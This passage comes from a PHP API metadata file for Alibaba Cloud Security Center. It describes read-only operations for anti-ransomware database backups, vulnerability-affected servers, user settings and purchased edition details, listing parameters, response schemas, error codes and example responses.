'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalRestoreTaskCount\\": 10,\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\",\\n \\"UnprotectedDatabaseCount\\": 5,\\n \\"RestoringTaskCount\\": 0,\\n \\"ProtectedDatabaseCount\\": 1,\\n \\"TotalRecoverableCount\\": 3,\\n \\"RegionCountList\\": [\\n {\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"AutomaticCount\\": \\"1\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeUniRecoverableList' => [ 'summary' => 'Queries the list of recoverable database backups.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware backup policy for the database.'."\n" .'>You can call the [DescribeUniBackupPolicies](~~DescribeUniBackupPolicies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when using paging. Default value: 20. If you leave this parameter empty, 20 entries are returned per page by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Database', 'in' => 'query', 'schema' => ['description' => 'The database name.', 'type' => 'string', 'required' => false, 'example' => 'msdb', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'F35F45B0-5D6B-4238-BE02-A62D0760****', 'title' => ''], 'Database' => ['description' => 'The database name.', 'type' => 'string', 'example' => 'msdb', 'title' => ''], 'PageSize' => ['description' => 'The number of recoverable database backup snapshots per page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of recoverable database backup snapshots.', 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], 'Count' => ['description' => 'The number of recoverable database backup snapshots on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'RecoverableInfoList' => [ 'description' => 'The list of recoverable database backup snapshots.', 'type' => 'array', 'items' => [ 'description' => 'The information about a recoverable database backup snapshot.', 'type' => 'object', 'properties' => [ 'LastTime' => ['description' => 'The timestamp of the latest backup. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671468180000', 'title' => ''], 'ResetTime' => ['description' => 'The **reset_time** value of the selected record in the recoverable point-in-time query for an Oracle database backup.', 'type' => 'integer', 'format' => 'int64', 'example' => '2021-01-30 08:04:36', 'title' => ''], 'RestoreInfo' => ['description' => 'The database restoration information when the database type is MSSQL. The value is a JSON string. Valid values:'."\n" .'- **name**: the database name.'."\n" .'- **files**: the database file path.', 'type' => 'string', 'example' => '{'."\n" .' "files": {'."\n" .' "qtc": "F:\\\\database\\\\qtc.mdf",'."\n" .' "qtc_log": "F:\\\\database\\\\qtc_0.ldf"'."\n" .' },'."\n" .' "name": "qtc"'."\n" .'}', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp when the backup started. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671468180000', 'title' => ''], 'ResetScn' => ['description' => 'The **reset_scn** value of the selected record in the recoverable point-in-time query for an Oracle database backup.', 'type' => 'string', 'example' => '4529940.0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query recoverable database backups', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniRecoverableList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUniRecoverableList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"F35F45B0-5D6B-4238-BE02-A62D0760****\\",\\n \\"Database\\": \\"msdb\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 23,\\n \\"Count\\": 20,\\n \\"RecoverableInfoList\\": [\\n {\\n \\"LastTime\\": 1671468180000,\\n \\"ResetTime\\": 0,\\n \\"RestoreInfo\\": \\"{\\\\n \\\\\\"files\\\\\\": {\\\\n \\\\\\"qtc\\\\\\": \\\\\\"F:\\\\\\\\\\\\\\\\database\\\\\\\\\\\\\\\\qtc.mdf\\\\\\",\\\\n \\\\\\"qtc_log\\\\\\": \\\\\\"F:\\\\\\\\\\\\\\\\database\\\\\\\\\\\\\\\\qtc_0.ldf\\\\\\"\\\\n },\\\\n \\\\\\"name\\\\\\": \\\\\\"qtc\\\\\\"\\\\n}\\",\\n \\"FirstTime\\": 1671468180000,\\n \\"ResetScn\\": \\"4529940.0\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeUniSupportRegion' => [ 'summary' => 'Queries the region that is supported by anti-ransomware for databases.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'F35F45B0-5D6B-4238-BE02-A62D0760****', 'title' => ''], 'UniSupportRegion' => [ 'description' => 'An array consisting of the region that is supported by anti-ransomware for databases.'."\n", 'type' => 'array', 'items' => ['description' => 'The region that is supported by anti-ransomware for databases.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F35F45B0-5D6B-4238-BE02-A62D0760****\\",\\n \\"UniSupportRegion\\": [\\n \\"cn-hangzhou\\"\\n ]\\n}","type":"json"}]', 'title' => 'DescribeUniSupportRegion', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniSupportRegion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUniSupportRegion', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeUserBackupMachines' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA04B21', 'title' => ''], 'Machines' => [ 'description' => 'The information about servers that have backup policies enabled.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server that has a backup policy enabled.', 'type' => 'string', 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA0****', 'title' => ''], 'PolicyName' => ['description' => 'The name of the policy enabled on the server.', 'type' => 'string', 'example' => 'policy_name_A', 'title' => ''], 'Id' => ['description' => 'The ID of the policy enabled on the server.', 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query servers with anti-ransomware backup policies enabled', 'summary' => 'Queries servers that have anti-ransomware backup policies enabled.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUserBackupMachines'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUserBackupMachines', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D0D6E6E4-CB8C-4897-B852-46AEFDA04B21\\",\\n \\"Machines\\": [\\n {\\n \\"Uuid\\": \\"D0D6E6E4-CB8C-4897-B852-46AEFDA0****\\",\\n \\"PolicyName\\": \\"policy_name_A\\",\\n \\"Id\\": 123\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeUserBaselineAuthorization' => [ 'summary' => 'Queries the status of cloud platform authorization information for a user.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.3.4', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '0AF20EB0-EBBC-4B94-9B84-F3BAFAC53EDE', 'title' => ''], 'UserBaselineAuthorization' => [ 'description' => 'The authorization information for cloud baseline configuration check.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The authorization status of the cloud platform configuration check. Valid values:'."\n" .'- **0**: Authorization is disabled. If authorization is disabled, you cannot use the cloud platform configuration check feature.'."\n" .'- **1**: Authorization is enabled. If authorization is enabled, you can use the cloud platform configuration check feature.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query cloud platform authorization status', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUserBaselineAuthorization'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUserBaselineAuthorization', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0AF20EB0-EBBC-4B94-9B84-F3BAFAC53EDE\\",\\n \\"UserBaselineAuthorization\\": {\\n \\"Status\\": 1\\n }\\n}","type":"json"}]', ], 'DescribeUserSetting' => [ 'summary' => 'Retrieves user-defined configurations for baseline checks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '112.94.XX.XX'."\n", 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'InvalidWarningKeepDays' => ['description' => 'The number of days to retain invalid alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****', 'title' => ''], 'AlertLevels' => [ 'description' => 'The list of alert notification levels. If the list is empty, no alerts are generated for custom policies.', 'type' => 'array', 'items' => ['description' => 'The list of alert notification levels. Valid values:'."\n" ."\n" .'1. high'."\n" .'2. medium'."\n" .'3. low.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query user-defined configurations', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUserSetting'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUserSetting', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"InvalidWarningKeepDays\\": 30,\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\",\\n \\"AlertLevels\\": [\\n \\"high\\"\\n ]\\n}","type":"json"}]', ], 'DescribeUuidsByVulNames' => [ 'summary' => 'Retrieves the list of servers that support vulnerability fixing based on vulnerability names.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92234', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to query. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'StatusList', 'in' => 'query', 'schema' => ['description' => 'The fix status of the vulnerability. Separate multiple statuses with commas (,). Valid values:'."\n" ."\n" .'- **1**: unfixed'."\n" .'- **2**: fix failed.', 'type' => 'string', 'required' => false, 'example' => '1,2', 'title' => ''], ], [ 'name' => 'Tag', 'in' => 'query', 'schema' => ['description' => 'The vulnerability tag.', 'type' => 'string', 'required' => false, 'example' => 'oval', 'title' => ''], ], [ 'name' => 'Level', 'in' => 'query', 'schema' => ['description' => 'The vulnerability level. Separate multiple levels with commas (,). Valid values:'."\n" ."\n" .'- **high**: high'."\n" .'- **medium**: medium'."\n" .'- **low**: low.', 'type' => 'string', 'required' => false, 'example' => 'high,low', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the vulnerability has been handled. Valid values:'."\n" .'- **y**: handled'."\n" .'- **n**: not handled.', 'type' => 'string', 'required' => false, 'example' => 'n', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '11286014', 'title' => ''], ], [ 'name' => 'VpcInstanceIds', 'in' => 'query', 'schema' => ['description' => 'The instance IDs of VPC-connected instances to query for vulnerabilities. Separate multiple instance IDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'vpc-uf6ssrvbrwe37ekw****,vpc-bp1aevy8sofi8mh1q****', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The asset information for the vulnerability query. You can set this parameter to the asset name, public IP address, or private IP address. Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => '10.7.', 'title' => ''], ], [ 'name' => 'SearchTags', 'in' => 'query', 'schema' => ['description' => 'The tag for querying vulnerabilities.', 'type' => 'string', 'required' => false, 'example' => 'oval', 'title' => ''], ], [ 'name' => 'FieldName', 'in' => 'query', 'schema' => ['description' => 'The container search field name.', 'type' => 'string', 'required' => false, 'example' => 'namespace', 'title' => ''], ], [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['description' => 'The container search field value.', 'type' => 'string', 'required' => false, 'example' => 'cas-adad-qeqwe', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The query type. Valid values:'."\n" ."\n" .'- **containerId**: container ID'."\n" .'- **uuid**: asset ID.', 'type' => 'string', 'required' => false, 'example' => 'uuid', 'title' => ''], ], [ 'name' => 'Necessity', 'in' => 'query', 'schema' => ['description' => 'The priority level of vulnerability fixing. Separate multiple levels with commas (,). Valid values:'."\n" ."\n" .'- **asap**: high'."\n" .'- **later**: medium'."\n" .'- **nntf**: low.', 'type' => 'string', 'required' => false, 'example' => 'asap,later,nntf', 'title' => ''], ], [ 'name' => 'VulNames', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of vulnerability names.'."\n" .'> You can call the [DescribeGroupedVul](~~DescribeGroupedVul~~) operation to obtain this parameter.', 'type' => 'array', 'items' => ['description' => 'The vulnerability name.', 'type' => 'string', 'required' => false, 'example' => 'centos:8:rhsa-2020:1665', 'title' => ''], 'required' => true, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '97286A-4A6B-4A4-95FA-EC7E3E2451', 'title' => ''], 'MachineInfoStatistics' => [ 'description' => 'The list of asset statistics information.', 'type' => 'array', 'items' => [ 'description' => 'The asset statistics information.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '18375c64-eaa2-4702-92b0-4ee7******', 'title' => ''], 'MachineIp' => ['description' => 'The IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Os' => ['description' => 'The operating system name of the server.', 'type' => 'string', 'example' => 'windows', 'title' => ''], 'MachineName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'TestMachine', 'title' => ''], 'MachineInstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-wz9gd1os5talju****', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the instance.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the associated instance.', 'type' => 'string', 'example' => '47.98.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the associated instance.', 'type' => 'string', 'example' => '172.18.XX.XX', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'VulCount' => ['description' => 'The total number of vulnerabilities on the server.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve servers that support vulnerability fixing by vulnerability name', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUuidsByVulNames'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUuidsByVulNames', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"97286A-4A6B-4A4-95FA-EC7E3E2451\\",\\n \\"MachineInfoStatistics\\": [\\n {\\n \\"Uuid\\": \\"18375c64-eaa2-4702-92b0-4ee7******\\",\\n \\"MachineIp\\": \\"192.168.XX.XX\\",\\n \\"Os\\": \\"windows\\",\\n \\"MachineName\\": \\"TestMachine\\",\\n \\"MachineInstanceId\\": \\"i-wz9gd1os5talju****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"InternetIp\\": \\"47.98.XX.XX\\",\\n \\"IntranetIp\\": \\"172.18.XX.XX\\"\\n }\\n ],\\n \\"VulCount\\": 2\\n}","type":"json"}]', ], 'DescribeVendorList' => [ 'summary' => 'Retrieves the supported vendor information for Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request, which can be used for troubleshooting and diagnostics.', 'type' => 'string', 'example' => '340D7FC4-D575-1661-8ACD-CFA7BE57B795', 'title' => ''], 'VendorNameList' => [ 'description' => 'The list of vendors.', 'type' => 'array', 'items' => ['description' => 'The vendor code.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve supported vendors', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVendorList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVendorList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"340D7FC4-D575-1661-8ACD-CFA7BE57B795\\",\\n \\"VendorNameList\\": [\\n \\"ALIYUN\\"\\n ]\\n}","type":"json"}]', ], 'DescribeVersionConfig' => [ 'summary' => 'Queries the version details of a purchased Security Center instance.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92237', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.0.XX.XX', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID that uses the Security Center service. '."\n" .'> Call the [GetUser](~~28681~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'MVAuthCount' => ['description' => 'The total number of authorizations when multiple versions are purchased.', 'type' => 'integer', 'format' => 'int32', 'example' => '5000', 'title' => ''], 'SasLog' => ['description' => 'Indicates whether log analysis is purchased. Valid values:'."\n" .'- **0**: Not purchased.'."\n" .'- **1**: Purchased.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SasScreen' => ['description' => 'Indicates whether the security dashboard is purchased. Valid values:'."\n" .'- **0**: Not purchased.'."\n" .'- **1**: Purchased.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'HoneypotCapacity' => ['description' => 'The number of purchased honeypot authorization quotas.', 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], 'MVUnusedAuthCount' => ['description' => 'The total number of remaining authorizations when multiple versions are purchased.', 'type' => 'integer', 'format' => 'int32', 'example' => '40', 'title' => ''], 'WebLock' => ['description' => 'Indicates whether web tamper-proofing is enabled. Valid values:'."\n" .'- **0**: Not enabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AppWhiteListAuthCount' => ['description' => 'The number of application whitelist authorizations.'."\n" .'> One authorization allows you to apply an application whitelist policy to one server. After the application whitelist feature is enabled, the account has 20 authorizations by default.', 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], 'RequestId' => ['description' => 'The unique request ID generated by Alibaba Cloud for this request.', 'type' => 'string', 'example' => 'C2DC96D2-DD2E-49D9-A28E-85590475DF55', 'title' => ''], 'LastTrailEndTime' => ['description' => 'The end timestamp of the last trial of Security Center. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1603934844000', 'title' => ''], 'Version' => ['description' => 'The purchased edition of Security Center. Valid values: '."\n" .'- **1**: Free Edition. '."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Advanced Edition.'."\n" .'- **6**: Anti-virus Edition. '."\n" .'- **7**: Ultimate Edition. '."\n" .'- **8**: Multi-version. '."\n" .'- **10**: Value-added services only.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'WebLockAuthCount' => ['description' => 'The number of purchased web tamper-proofing authorizations. One authorization allows you to enable web tamper-proofing for one server. Value range: 0 to N.'."\n" .'> N is the number of servers that you own.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'ReleaseTime' => ['description' => 'The UNIX timestamp when the Security Center instance expires. Unit: milliseconds.'."\n" .'> If you do not complete renewal within 7 days after the instance expires, your paid instance is downgraded to Free Edition. You can no longer use the features of the paid edition, and the Security Center configuration data and historical alerting data (such as DDoS alerts) become inaccessible. In this case, you must repurchase Security Center to enable the paid edition. For more information, see [Purchase Security Center](~~42308~~).', 'type' => 'integer', 'format' => 'int64', 'example' => '1625846400000', 'title' => ''], 'HighestVersion' => ['description' => 'The highest purchased edition of Security Center. Valid values:'."\n" .'- **1**: Free Edition.'."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Advanced Edition.'."\n" .'- **6**: Anti-virus Edition.'."\n" .'- **7**: Ultimate Edition.'."\n" .'- **10**: Value-added services only.'."\n" .'> If a single version is purchased, this value indicates the corresponding edition. If multiple versions are purchased, this value indicates the highest edition among the purchased versions.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AssetLevel' => ['description' => 'The number of purchased server authorizations.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'IsOverBalance' => ['description' => 'Indicates whether the number of existing servers exceeds the maximum number of purchased authorizations. Valid values:'."\n" .'- **false**: Not exceeded.'."\n" .'- **true**: Exceeded.'."\n" 